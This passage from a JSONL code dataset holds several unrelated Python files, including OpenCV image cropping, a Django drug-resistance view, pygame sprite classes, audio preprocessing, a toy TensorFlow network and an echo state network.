faces_out = []\n for cascade in face_cascades:\n face_cascade = cv2.CascadeClassifier('cascades/'+cascade)\n faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n faces_out += list(faces)\n if len(faces_out) >=200:\n return faces_out\n else:\n return consolidate_rect(faces_out)\n\ndef DetectEyes(img):\n '''Finds eyes using all cascades available.'''\n eye_cascades = ['haarcascade_eye_tree_eyeglasses.xml','haarcascade_eye.xml']\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n eyes_out = []\n for cascade in eye_cascades:\n eye_cascade = cv2.CascadeClassifier('cascades/'+cascade)\n eyes = eye_cascade.detectMultiScale(gray, 1.3, 5)\n eyes_out += list(eyes)\n if len(eyes_out) >=200:\n return eyes_out\n else:\n return consolidate_rect(eyes_out)\n\ndef crop(img_raw,center,shape):\n '''\n Crops the given image into the given shape, focusing on the given center.\n\n Parameters\n ----------\n img_raw : cv2.image\n Raw image\n center : tuple\n Center to crop around\n shape : tuple\n Output shape\n\n Returns\n -------\n img : cv2.image\n Cropped image\n '''\n xc,yc = center\n img = resize(img_raw,shape)\n if img.shape[0]>shape[0]:\n h0,hf = int(yc-0.5*shape[0]),int(yc+0.5*shape[0])\n h0 = max([h0,0])\n hf = min([hf,img.shape[0]])\n while hf-h0 < shape[0]:\n if hf < img.shape[0]:\n hf+=1\n else:\n h0-=1\n while hf-h0 > shape[0]:\n hf-=1\n img_ = img[h0:hf,:]\n elif img.shape[1]>shape[1]:\n w0,wf = int(xc-0.5*shape[1]),int(xc+0.5*shape[1])\n w0 = max([w0,0])\n wf = min([wf,img.shape[1]])\n while wf-w0 < 
shape[1]:\n if wf < img.shape[1]:\n wf+=1\n else:\n w0-=1\n while wf-w0 > shape[1]:\n wf-=1\n img_ = img[:,w0:wf]\n else:\n img_ = img\n return img_\n\ndef resize(img,shape):\n img_ = imutils.resize(img, width=shape[1])\n if img_.shape[0] < shape[0]:\n img_ = imutils.resize(img, height=shape[0])\n return img_\n\ndef find_center(img_raw,shape):\n '''\n Find the best center to crop the given image.\n If tries to detect faces, then tries to detect eyes if the image is square like.\n Finally it returns the center based on the image's aspect ratio.\n\n Parameters\n ----------\n img_raw : cv2.image\n Raw image\n shape : tuple\n Shape to crop\n\n Returns\n -------\n center : tuple\n Location of the optimum center\n '''\n img = resize(img_raw,shape)\n center=None\n \n faces_out = DetectFaces(img)\n if (len(faces_out) != 0):\n if len(faces_out) >=200:\n xc,yc = zip(*[((x+0.5*w),(y+0.5*h)) for x,y,w,h in faces_out[:50]])\n else:\n xc,yc = zip(*[((x+0.5*w),(y+0.5*h)) for x,y,w,h in faces_out])\n center=(np.mean(xc),np.mean(yc))\n\n r = img.shape[0]/float(img.shape[1])\n if (center is None)&(r < 1.1)&(r > 0.9):\n eyes_out = DetectEyes(img)\n if len(eyes_out) != 0:\n if len(eyes_out) >=200:\n xc,yc = zip(*[((x+0.5*w),(y+0.5*h)) for x,y,w,h in eyes_out[:50]])\n else:\n xc,yc = zip(*[((x+0.5*w),(y+0.5*h)) for x,y,w,h in eyes_out])\n center = (np.mean(xc),np.mean(yc))\n if r > 2:\n center = (int(0.5*img.shape[1]),int(0.15*img.shape[0]))\n else:\n center = (int(0.5*img.shape[1]),int(0.25*img.shape[0]))\n return center\n \n\ndef crop_main(img_file,path,shape):\n '''\n Crops the given image into the given shape\n\n Parameters\n ----------\n img_file : str\n Name of the image file\n path : str\n Path to the image\n shape : tuple\n Output shape\n\n Returns\n -------\n img_file : str\n Name of the image file\n img : cv2.image\n Image object that can be saved using:\n >>> cv2.imwrite(out_file,img)\n '''\n img_raw = cv2.imread(path+'/'+img_file)\n try:\n center = find_center(img_raw,shape)\n img = crop(img_raw,center,shape)\n return img_file,img\n except:\n return 'NA',None\n\n\ndef show(img,rects):\n for i,(x,y,w,h) in enumerate(rects):\n cv2.rectangle(img,(x,y),(x+w,y+h),(255,0,0),2)\n cv2.imshow('img',img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":6178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"549852159","text":"from pulsar import new_event_loop\nfrom pulsar.apps.test import unittest\nfrom pulsar.apps.data import create_store\n\n\ntry:\n import pymongo\n client = pymongo.MongoClient()\n alive = client.alive()\nexcept Exception:\n alive = False\n\n\n@unittest.skipUnless(alive, \"Requires pymongo and a running mongodb\")\nclass TestMongoDb(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.store = cls.create_store(loop=new_event_loop())\n\n @classmethod\n def create_store(cls, **kw):\n return create_store('mongodb://127.0.0.1:28017', **kw)\n\n def test_store(self):\n client = self.store.client()\n alive = client.alive()\n self.assertTrue(alive)\n","sub_path":"tests/stores/mongodb/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"350370348","text":"from django.shortcuts import render\nfrom django.utils import timezone\nfrom .models import Post\nfrom .models import PostSRR\nfrom django.shortcuts import render, 
get_object_or_404\nfrom .forms import PostForm\nfrom .forms import SrrForm\nfrom django.shortcuts import redirect\nfrom django.http import HttpResponseRedirect\nimport json\n\n# Create your views here.\n\ndef post_list(request):\n\tposts = Post.objects.filter(published_date__lte=timezone.now()).order_by('published_date')\n\n\treturn render(request, 'drug_test/post_list.html', {'posts':posts})\n\n\ndef post_detail(request, pk):\n\tpost = get_object_or_404(Post, pk=pk)\n\n\treturn render(request, 'drug_test/post_detail.html', {'post': post})\n\n\ndef post_new(request):\n\tif request.method == \"POST\":\n\t\tform = PostForm(request.POST)\n\n\t\tif form.is_valid():\n\t\t\tpost = form.save(commit=False)\n\t\t\tpost.author = request.user\n\t\t\tpost.published_date = timezone.now()\n\t\t\tpost.save()\n\n\t\treturn redirect('post_detail', pk=post.pk)\n\telse:\n\t\tform = PostForm()\n\n\treturn render(request, 'drug_test/post_edit.html', {'form': form})\n\n\ndef post_edit(request, pk):\n\tpost = get_object_or_404(Post, pk=pk)\n\tif request.method == \"POST\":\n\t\tform = PostForm(request.POST, instance=post)\n\t\tif form.is_valid():\n\t\t\tpost = form.save(commit=False)\n\t\t\tpost.author = request.user\n\t\t\tpost.published_date = timezone.now()\n\t\t\tpost.save()\n\t\t\treturn redirect('post_detail', pk=post.pk)\n\telse:\n\t\tform = PostForm(instance=post)\n\n\treturn render(request, 'drug_test/post_edit.html', {'form': form})\n\n\n\n######################################################\n## Form for entering SRR identifier\n\ndef post_srr(request):\n\tif request.method == \"POST\":\n\t\tform = SrrForm(request.POST)\n\n\t\tif form.is_valid():\n\t\t\tpost = form.save(commit=False)\n\t\t\tpost.author = request.user\n\t\t\tpost.created_date = timezone.now()\n\t\t\tpost.save()\n\n\t\treturn redirect('job_status', pk=post.pk)\n\n\telse:\n\t\tform = SrrForm()\n\n\treturn render(request, 'drug_test/job_new.html', {'form': form})\t\n\n\n\ndef update_object_status(post):\n\tpost.dataset_link = 'data/test_example.vcf'\n\tpost.save()\n\n\treturn post\n\n\ndef job_status(request, pk):\n\n\tpost = get_object_or_404(PostSRR, pk=pk)\n\n\tpost = update_object_status(post)\n\n\tif post.dataset_link != '':\n\t\treturn render(request, 'drug_test/job_finished.html', {'post': post})\n\n\n\treturn render(request, 'drug_test/job_status.html', {'post': post})\n\n\n\n\n#################\n\npath = r'/home/roma/djangoenv/drug_test/data'\nresistance_path = r'/home/roma/djangoenv/drug_test/resistance.json'\n\n\ndef get_med_resistance():\n res = json.load(open(resistance_path))\n result = {}\n for k, v in res.items():\n for v_i in v:\n result[(v_i[0], v_i[1][0], v_i[1][1])] = k\n\n return result\n\n\nMED_RESISTANCE = get_med_resistance()\n\n\ndef calc_resistance(inp_data):\n result = []\n for item in inp_data[1:]:\n curr = tuple([int(item[1])] + item[3: 5])\n if curr in MED_RESISTANCE:\n result.append(MED_RESISTANCE[curr])\n\n return result\n\n\n\ndef dst_detail(request, pk):\n\tpost = get_object_or_404(PostSRR, pk=pk)\n\n\t#filename = post.dataset_link\n\tfilename = 'test_example.vcf'\n\n\tdata = open('{}/{}'.format(path, filename)).readlines()\n\tdata = list(map(lambda x: x.split('\\t'), data[42:]))\n\tresistance_items = ', '.join(calc_resistance(data))\n\n\tdata_res = []\n\tfor item in data[1:]:\n\t\tcurr = tuple([int(item[1])] + item[3: 5])\n\t\tif curr in MED_RESISTANCE:\n\t\t\tdata_res.append(item[1:])\n\n\n\treturn render(request, 'drug_test/dst_detail.html', {'post': post, 'data': data_res, 'resistance_items': 
resistance_items})\n\n","sub_path":"drug_test/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"313109458","text":"n = 0\nroot = 0\nlch = []\nrch = []\n\n\ndef print_in_level():\n stack = [root]\n i = 0\n while len(stack) != 0:\n i += 1\n print('Level {:d} : '.format(i), end='')\n for each in stack[0:-1]:\n print(each, end=' ')\n print(stack[-1])\n temp = []\n for each in stack:\n if lch[each] != 0:\n temp.append(lch[each])\n if rch[each] != 0:\n temp.append(rch[each])\n stack = temp\n\n\ndef print_in_zigzag():\n stack = [root]\n i = 0\n while len(stack) != 0:\n i += 1\n if i%2 == 1:\n print('Level {:d} from left to right: '.format(i), end=' ')\n for each in stack[0:-1]:\n print(each, end=' ')\n print(stack[-1])\n else:\n print('Level {:d} from right to left: '.format(i), end=' ')\n for each in stack[::-1][0:-1]:\n print(each, end=' ')\n print(stack[0])\n temp = []\n for each in stack:\n if lch[each] != 0:\n temp.append(lch[each])\n if rch[each] != 0:\n temp.append(rch[each])\n stack = temp\n\n\nif __name__ == '__main__':\n arr = [int(i) for i in input().split()]\n n = arr[0]\n root = arr[1]\n lch = [0 for i in range(n+1)]\n rch = [0 for i in range(n+1)]\n for i in range(n):\n arr = [int(j) for j in input().split()]\n lch[arr[0]] = arr[1]\n rch[arr[0]] = arr[2]\n print_in_level()\n print_in_zigzag()\n","sub_path":"Code/CodeRecords/2304/60696/258875.py","file_name":"258875.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"108296909","text":"import os\nimport sys\nimport numpy as np \nimport matplotlib.pyplot as plt \nfrom random import shuffle\nfrom progressbar import progressbar\nimport glob\nimport librosa\n\n\n\ndataset_folder = 'audio_samples_download/samples/'\nclasses = os.listdir(dataset_folder)\n\n\ndef remove_outliers_and_too_short_files():\n for class_ in classes:\n print(class_)\n files = os.listdir(dataset_folder + class_)\n files = [os.path.join(dataset_folder, class_, file) for file in files]\n srs = []\n for file in progressbar(files):\n try:\n y, sr = librosa.load(file,sr = None)\n srs.append(sr)\n\n if len(y)/sr < 9.751:\n print(' File too short:',file)\n os.remove(file)\n except:\n print(' PROBLEM with file:',file)\n os.remove(file)\n \n u = srs == np.ones(np.shape(srs))*srs[0]\n if (np.sum(u) == len(srs)):\n print(' All samples are sampled at',srs[0],'Hz')\n else:\n print('ERROR: different sampling rates')\n\ndef standardize_file_length(duration = 9.751):\n # make all files same length\n\n dataset_folder = 'audio_samples_download/samples'\n classes = os.listdir(dataset_folder)\n\n for class_ in classes:\n files = glob.glob(os.path.join(dataset_folder, class_,'*.wav'))\n for file in progressbar(files):\n y, sr = librosa.load(file,sr = None,duration = duration)\n librosa.output.write_wav(file, y, 16000)\n ","sub_path":"preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"650771307","text":"import random\n\nimport pygame\nfrom pygame.math import Vector2\n\nimport settings\nfrom sprite.items import Carrot, Jetpack\n\n\nclass LivingBeing(pygame.sprite.Sprite):\n \"\"\"Describes common behavior and attributes between living beings.\n\n Attributes:\n image_names (list): List of image names that\n will be render 
inside the sprite.\n \"\"\"\n\n image_names = []\n\n def __init__(self, game, images, pos, groups):\n \"\"\"\n Args:\n game (Game): A reference for the running game.\n image (pygame.Surface): Image surface loaded via pygame.image.load.\n pos (tuple): X and Y axis positions where the sprite will be draw.\n groups (list): A list of pygame.sprite.Group.\n \"\"\"\n super(LivingBeing, self).__init__(groups)\n self._image_frames(images)\n self.game = game\n self.image = images[0]\n self.rect = self.image.get_rect()\n self.rect.x, self.rect.y = pos\n self.last_update = 0\n\n def _image_frames(self, images):\n \"\"\"Save image list.\n Override this method in order to give some context to the images.\"\"\"\n self.image_frames = images\n\n @classmethod\n def new(cls, game, **kwargs):\n \"\"\"Create a new instance of the living being.\n\n Args:\n game (Game): A reference for the running game.\n \"\"\"\n images = [game.spritesheet.get_image(i) for i in cls.image_names]\n return cls(game, images, **kwargs)\n\n\nclass Player(LivingBeing):\n \"\"\"\n Attributes:\n _layer (int): The layer where the player will be draw.\n image_names (list): List of Bunny image names.\n \"\"\"\n\n _layer = settings.PLAYER_LAYER\n image_names = [\n \"bunny1_stand.png\",\n \"bunny1_ready.png\",\n \"bunny1_jump.png\",\n \"bunny1_hurt.png\",\n \"bunny1_walk1.png\",\n \"bunny1_walk2.png\",\n ]\n\n def __init__(self, game, images, pos=(0, 0), groups=[]):\n \"\"\"\n Args:\n game (Game): A reference for the running game.\n images (list): List of image surfaces loaded via pygame.image.load.\n pos (tuple): X and Y axis positions where the Player will be draw.\n groups (list): A list of pygame.sprite.Group.\n \"\"\"\n super(Player, self).__init__(game, images, pos, groups)\n self.walking = False\n self.jumping = False\n self.boosted = False\n self.alive = True\n self.score = 0\n self.current_frame = 0\n self.pos = Vector2(self.rect.x, self.rect.y)\n self.vel = Vector2(0, 0)\n self.acc = Vector2(0, 0)\n\n def _image_frames(self, images):\n \"\"\"Organize image frames in a dictionary.\n\n Args:\n images (list): List of image surfaces loaded via pygame.image.load.\n \"\"\"\n self.image_frames = {\n \"jump\": images[2],\n \"hurt\": images[3],\n \"stand\": images[:2],\n \"walkr\": images[4:],\n \"walkl\": [],\n }\n\n for frame in self.image_frames[\"walkr\"]:\n self.image_frames[\"walkl\"].append(\n pygame.transform.flip(frame, True, False)\n )\n\n def standing(self):\n \"\"\"Check if the player is standing over a platform.\"\"\"\n if self.vel.y > 0 and self.alive:\n hits = pygame.sprite.spritecollide(\n self, self.game.platforms, False\n )\n if hits:\n lowest = hits[0]\n for hit in hits:\n if hit.rect.bottom > lowest.rect.bottom:\n lowest = hit\n if (\n self.pos.x < lowest.rect.right + 10\n and self.pos.x > lowest.rect.left - 10\n ):\n if self.pos.y < lowest.rect.centery:\n self.pos.y = lowest.rect.top\n self.vel.y = 0\n self.jumping = False\n self.boosted = False\n\n def walk(self):\n \"\"\"Move the player backwards/forwards if an arrow key was pressed.\"\"\"\n key = pygame.key.get_pressed()\n if key[pygame.K_LEFT]:\n self.acc.x = -settings.PLAYER_ACC\n if key[pygame.K_RIGHT]:\n self.acc.x = settings.PLAYER_ACC\n\n # apply friction\n self.acc.x += self.vel.x * settings.PLAYER_FRICTION\n\n # motion equation\n self.vel += self.acc\n if abs(self.vel.x) < 0.1:\n self.vel.x = 0\n self.pos += self.vel + settings.PLAYER_ACC * self.acc\n\n # wrap around the sides of the screen\n if self.pos.x > settings.WIDTH + (self.rect.width / 2):\n 
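# horizontal wrap: the sprite must travel a full half-width past the\n            # screen edge before it reappears on the opposite side, so the wrap\n            # never visibly clips the bunny mid-sprite\n            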
self.pos.x = 0 - (self.rect.width / 2)\n if self.pos.x < 0 - (self.rect.width / 2):\n self.pos.x = settings.WIDTH + (self.rect.width / 2)\n\n # update walking status according to the x speed\n if self.vel.x != 0:\n self.walking = True\n else:\n self.walking = False\n\n def jump(self):\n \"\"\"Perform a jump.\"\"\"\n self.rect.y += 2\n hits = pygame.sprite.spritecollide(self, self.game.platforms, False)\n self.rect.y -= 2\n if hits and not self.jumping:\n self.jumping = True\n self.vel.y = settings.PLAYER_STRENGTH\n self.game.jump_sound.play()\n\n def cut_jump(self):\n \"\"\"Shrink the jump.\"\"\"\n if self.jumping and not self.boosted:\n if self.vel.y < -6:\n self.vel.y = -6\n\n def hit_item(self):\n \"\"\"Check if the player hitted an item.\"\"\"\n if self.alive:\n for hit in pygame.sprite.spritecollide(\n self, self.game.items, True\n ):\n if isinstance(hit, Carrot):\n self.game.stage_clear()\n break\n elif isinstance(hit, Jetpack):\n self.boosted = True\n self.vel.y = settings.BOOST_POWER\n self.game.powerup_sound.play()\n\n def hit_spring(self):\n \"\"\"Check if the player hitted an spring.\"\"\"\n if self.alive:\n for hit in pygame.sprite.spritecollide(\n self, self.game.springs, False\n ):\n if not hit.fired:\n edges = [\n self.rect.bottom\n in range(hit.rect.top, hit.rect.top + 10),\n self.pos.x > (hit.rect.left - 10),\n self.pos.x < (hit.rect.right + 10),\n ]\n if all(edges):\n hit.fired = True\n self.boosted = True\n self.vel.y = settings.BOOST_SPRING\n self.game.spring_sound.play()\n break\n\n def hit_enemy(self):\n \"\"\"Check if the player hitted a enemy.\"\"\"\n if self.alive:\n for hit in pygame.sprite.spritecollide(\n self, self.game.enemies, False, pygame.sprite.collide_mask\n ):\n self.alive = False\n self.game.death_sound.play()\n\n def animate(self):\n \"\"\"Switch between image frames.\"\"\"\n now = pygame.time.get_ticks()\n\n if not self.alive:\n if now - self.last_update > 100:\n self.last_update = now\n bottom = self.rect.bottom\n self.image = self.image_frames[\"hurt\"]\n self.rect = self.image.get_rect()\n self.rect.bottom = bottom\n\n elif self.jumping or self.boosted:\n if now - self.last_update > 100:\n self.last_update = now\n bottom = self.rect.bottom\n self.image = self.image_frames[\"jump\"]\n self.rect = self.image.get_rect()\n self.rect.bottom = bottom\n\n elif self.walking:\n if now - self.last_update > 180:\n self.last_update = now\n self.current_frame = (self.current_frame + 1) % 2\n bottom = self.rect.bottom\n direction = \"walkr\" if self.vel.x > 0 else \"walkl\"\n self.image = self.image_frames[direction][self.current_frame]\n self.rect = self.image.get_rect()\n self.rect.bottom = bottom\n\n elif not self.jumping and not self.walking:\n if now - self.last_update > 250:\n self.last_update = now\n self.current_frame = (self.current_frame + 1) % 2\n bottom = self.rect.bottom\n self.image = self.image_frames[\"stand\"][self.current_frame]\n self.rect = self.image.get_rect()\n self.rect.bottom = bottom\n\n # update sprite mask\n self.mask = pygame.mask.from_surface(self.image)\n\n def update(self):\n \"\"\"Check if the player is alive and perform\n all animations like walking, jumping, etc.\"\"\"\n\n # reset acceleration and gravity values\n self.acc = Vector2(0, settings.GRAVITY)\n\n # test if the player collided with any platform\n self.standing()\n\n # move left or right according to players command\n self.walk()\n\n # check for poweups\n self.hit_item()\n\n # check for springs\n self.hit_spring()\n\n # check if hit a mob\n self.hit_enemy()\n\n # 
animate player sprite\n self.animate()\n\n # update player position\n self.rect.midbottom = self.pos\n\n # when player gets close to the top initiate the view scrolling\n if self.rect.top <= settings.HEIGHT / 4:\n amount = max(abs(self.vel.y), 2)\n self.pos.y += amount\n self.game.scroll(amount)\n\n # if the player falls the game is over\n if self.rect.bottom > settings.HEIGHT:\n self.game.over()\n\n\nclass Enemy(LivingBeing):\n \"\"\"Describes common behavior and attributes between enemies.\n\n Attributes:\n _layer (int): The layer where the enemy will be draw.\n \"\"\"\n\n _layer = settings.ENEMIES_LAYER\n\n def __init__(self, *args, **kwargs):\n super(Enemy, self).__init__(*args, **kwargs)\n\n\nclass FlyMan(Enemy):\n \"\"\"A flying enemy with a propeller in the head.\n This enemy crosses the screen horizontally in a random speed.\n\n Attributes:\n image_names (list): List of FlyMan image names.\n \"\"\"\n\n image_names = [\n \"flyMan_fly.png\",\n \"flyMan_jump.png\",\n \"flyMan_stand.png\",\n \"flyMan_still_fly.png\",\n \"flyMan_still_jump.png\",\n \"flyMan_still_stand.png\",\n ]\n\n def __init__(self, game, images, pos, groups):\n \"\"\"\n Args:\n images (list): List of image surfaces loaded via pygame.image.load.\n pos (tuple): X and Y axis positions where the FlyMan will be draw.\n groups (list): A list of pygame.sprite.Group.\n \"\"\"\n super(FlyMan, self).__init__(game, images, pos, groups)\n self.vx = random.randrange(1, 4)\n self.vy = 0\n self.dy = 0.5\n\n # if it starts on the right side of the screen\n if self.rect.x > settings.WIDTH / 2:\n self.vx *= -1 # invert direction\n\n def update(self):\n \"\"\"Move FlyMan or kill it if leaves the screen.\"\"\"\n self.rect.x += self.vx\n self.vy += self.dy\n self.rect.y += self.vy\n\n # switch direction on Y axis if reached the boundaries\n if self.vy > 3 or self.vy < -3:\n self.dy *= -1\n\n if (\n self.rect.left > settings.WIDTH + 100\n or self.rect.right < -100\n or self.rect.top >= settings.HEIGHT\n ):\n self.kill()\n else:\n self.animate()\n\n def animate(self):\n \"\"\"Switch between image frames.\"\"\"\n now = pygame.time.get_ticks()\n\n if now - self.last_update > settings.FPS:\n self.last_update = now\n center = self.rect.center\n if self.dy < 0: # going up\n if self.image == self.image_frames[0]:\n self.image = self.image_frames[3]\n else:\n self.image = self.image_frames[0]\n else: # going down\n if self.image == self.image_frames[1]:\n self.image = self.image_frames[4]\n else:\n self.image = self.image_frames[1]\n self.rect = self.image.get_rect()\n self.mask = pygame.mask.from_surface(self.image)\n self.rect.center = center\n","sub_path":"sprite/living.py","file_name":"living.py","file_ext":"py","file_size_in_byte":12544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"328269411","text":"\n'''\nVery simple neural network that identifies if the three numbers are high or low.\nlabels has 2 values, for low (0) and high (1)\n'''\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\n# Imports\nimport numpy as np\nimport tensorflow as tf\n\n\n# just 2 test datas\ndata = np.array([\n [1.0, 1.0, 1.0],\n [0.0, 0.0, 0.0]\n])\n\n# labels or the correct answers of the test datas\nlabels = np.array([[0.0,1.0],[1.0,0.0]])\n\n\n# input - None is for batch, 3 is for number of input per batch\nx = tf.placeholder(tf.float32, [None,3])\nw = tf.Variable(tf.zeros([3,2])) # create 3 weights (1 for each input) for 2 neurons\nb = 
tf.Variable(tf.zeros([2])) # create a bias for each neuron. This is just another weight that we do not matmul with the input\n\n# initialize the variables defined above\ninit = tf.initialize_all_variables()\n\n# model using softmax activation function. Formula is always input * weights + bias then feed to the activation\nm = tf.nn.softmax(tf.matmul(x, w) + b)\n\n# labels or correct answers\ny = tf.placeholder(tf.float32, [None, 2])\n\n# calculate the loss distance using cross entropy\ncross_entropy = -tf.reduce_sum(y * tf.log(m))\n\n# check if highest probability is the same as correct answers\nis_correct = tf.equal(tf.argmax(m,1), tf.argmax(y, 1))\naccuracy = tf.reduce_mean(tf.cast(is_correct, tf.float32))\n\noptimizer = tf.train.GradientDescentOptimizer(0.003)\ntrain_step = optimizer.minimize(cross_entropy)\n\nsess = tf.Session()\nsess.run(init)\n\nfor i in range(1000):\n\ttrain_data = {x: data, y: labels}\n\ta,c = sess.run([accuracy, cross_entropy], feed_dict=train_data)\n\tsess.run(train_step, feed_dict=train_data)\n\n\tif (0 == i % 100):\n\t\ta,c = sess.run([accuracy, cross_entropy], feed_dict=train_data)\n\t\tprint(a,c)\n\nr = sess.run(m, feed_dict=train_data)\nprint(r)","sub_path":"03_color_temp.py","file_name":"03_color_temp.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"256978894","text":"import numpy as np\nfrom numpy import dot, square, tanh\n# from sklearn.metrics import mean_squared_error\nfrom math import sqrt\n\n# TODO: added matplotlib\nimport matplotlib.pyplot as plt\n\n\n###########\n# CLASSES #\n###########\n\nclass EchoStateNetwork:\n    def __init__(self, input, res, outputsize):\n        self.input = input\n        self.res = res\n        self.outputsize = outputsize\n\n        # TODO: changed weights initialization to half standard normal and\n        # removed bias\n\n        self.inputweights = np.random.randn(input, res) * 0.25\n        self.reservoirweights = np.random.randn(res, res) * 0.25\n        self.outputweights = np.random.randn(res, outputsize) * 0.25\n        # self.outputweights = np.random.randn(res+1, output) * 0.25\n\n        # TODO: changed output initialization and input size of activities\n        self.output = np.zeros((1, outputsize))\n        self.activ = np.zeros((outputsize, res))\n        # self.activ = np.zeros((1, res+1))\n\n    def forwardPass(self, reservoir_input):\n\n        # TODO: changed forward pass computation\n\n        # Compute the input that is fed into the reservoir\n        external_input = reservoir_input * self.inputweights\n\n        # Get the recurrent input to the reservoir\n        recurrent_input = self.activ[0, :self.res]\n\n        # Compute the reservoir activity based on the reservoir input and the\n        # recurrent reservoir activity (from the previous time step)\n        res_act = np.tanh(\n            external_input + np.matmul(recurrent_input, self.reservoirweights)\n        )\n\n        # bias\n        # one = np.array([[1]])\n        # res_act = np.concatenate((res_act, one), axis=1)\n\n        # Update the ESN's reservoir activity\n        self.activ = res_act\n\n        # Compute the output of the ESN\n        network_output = np.matmul(res_act, self.outputweights)\n\n        # Update the ESN's output\n        self.output = network_output\n\n    def reset(self):\n        # TODO: changed the dimensionality of the activity\n        self.activ = np.zeros((self.outputsize, self.res))\n\n    def oscillator(self):\n        self.forwardPass(self.output)\n\n    def teacherForcing(self, target):\n        self.output = target\n\n    def train(self, seq, washout, training, test):\n\n        self.reset()\n\n        # Washout\n        for i in range(washout):\n\n            # 
TODO: changed order of teacher forcing and oscillator call\n\n self.oscillator()\n self.teacherForcing(seq[i])\n\n # TODO: renamed a to activities and removed b # to training_sequence\n\n activities = np.zeros((training, self.res))\n # activities = np.zeros((training, self.res+1))\n\n training_sequence = np.zeros((training, self.outputsize))\n\n\n # TODO: renamed c to net_out\n net_out = np.zeros((training, self.outputsize))\n\n # Training\n for i in range(washout, washout + training):\n self.oscillator()\n\n # TODO: since output and activity dimensionalities have been\n # changed (see __init__ and forwardPass), these line were\n # adapted accordingly\n\n # net_out[i-washout] = self.output\n\n net_out[i - washout, 0] = self.output\n\n activities[i - washout] = self.activ\n\n self.teacherForcing(seq[i])\n training_sequence[i-washout] = seq[i]\n\n # TODO: changed rms\n rms = my_rmse(net_out=net_out[:, 0],\n target=seq[washout:training + washout])\n\n print('RMSE1 = ' + str(rms))\n\n # Perform pseudo matrix inversion of the recorded reservoir activities\n # to calculate output weights according to\n # W_out * activities = net_out\n # W_out = net_out * pinv(activities)\n\n inv_activities = np.linalg.pinv(activities)\n\n\n # TODO: changed output weight calculation slightly\n # self.outputweights = np.dot(np.linalg.pinv(activities), training_sequence)\n # Compute the output weights\n\n self.outputweights = np.matmul(inv_activities, training_sequence)\n \n\n # Test\n for i in range(washout+test, washout + training+test):\n\n\n self.oscillator()\n\n # TODO: again, output size was adapted\n # net_out[i-washout-200] = self.output\n net_out[i-washout-test, 0] = self.output\n\n # TODO: actually, testing should work without teacher forcing...\n self.teacherForcing(seq[i])\n\n # TODO: changed rms\n rms = my_rmse(net_out=net_out[:, 0],\n target=seq[washout + test:training + washout + test])\n\n print('RMSE2 = ' + str( rms ))\n\n # self.outputweights = dot( dot(np.ravel(b),a), np.linalg.inv( dot(a,a_T) + \\\n # reg*np.eye(200) ) )\n\n # self.outputweights = np.dot(np.dot(np.linalg.inv(np.dot(a.T, a) + reg * np.eye(self.res+1)), a.T), b)\n\n self.reset()\n\n # Washout\n for i in range(washout):\n\n # TODO: again changed order of teacher forcing and oscillator call\n\n self.oscillator()\n self.teacherForcing(seq[i])\n\n # TODO: as above, renamed c to net_out\n net_out = np.zeros((test, self.outputsize))\n\n\n # test\n for i in range(washout, washout + test):\n self.oscillator()\n # TODO: again net_output dimension was changed\n # net_out[i-washout] = self.output\n net_out[i - washout, 0] = self.output\n\n # TODO: actually, testing should work without teacher forcing...\n # self.teacherForcing(seq[i])\n\n # Briefly visualize performance\n plt.plot(range(test), seq[washout: washout + test], label=\"Target\")\n plt.plot(range(test), net_out[:, 0], linestyle=\"dashed\", color=\"red\",\n label=\"Network output\")\n plt.legend()\n plt.show()\n\n\n # TODO: changed rms\n rms = my_rmse(net_out=net_out[:, 0],\n target=seq[washout:test + washout])\n\n print('RMSE = ' + str(rms))\n\n\n#############\n# FUNCTIONS #\n#############\n\ndef my_rmse(net_out, target):\n \"\"\"\n This function calculates the root mean squared error for a given network\n output and target\n \"\"\"\n\n # Get the length of the sequence\n seq_len = len(net_out)\n\n # Root mean square error calculation\n rmse = np.sqrt((1 / seq_len) * np.sum(np.square(net_out - target)))\n\n return rmse\n\n\n##########\n# SCRIPT #\n##########\n\nseq = np.array\nseq 
= np.loadtxt(\"sequence.txt\")\n\n\n\n\nfs = 700 # sample rate \nf = 20 # the frequency of the signal\n\nx = np.arange(fs) # the points on the x axis for plotting\n# compute the value (amplitude) of the sine wave for each sample\ny = np.sin(2*np.pi*f * (x/fs)) \n\n\n# y is already the sine wave; applying np.sin() to it again was a bug\nsin = y\n\n\nesn = EchoStateNetwork(1, 10, 1)\nesn.train(sin, 100, 400, 200)\n","sub_path":"EchoStateNetwork.py","file_name":"EchoStateNetwork.py","file_ext":"py","file_size_in_byte":6854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
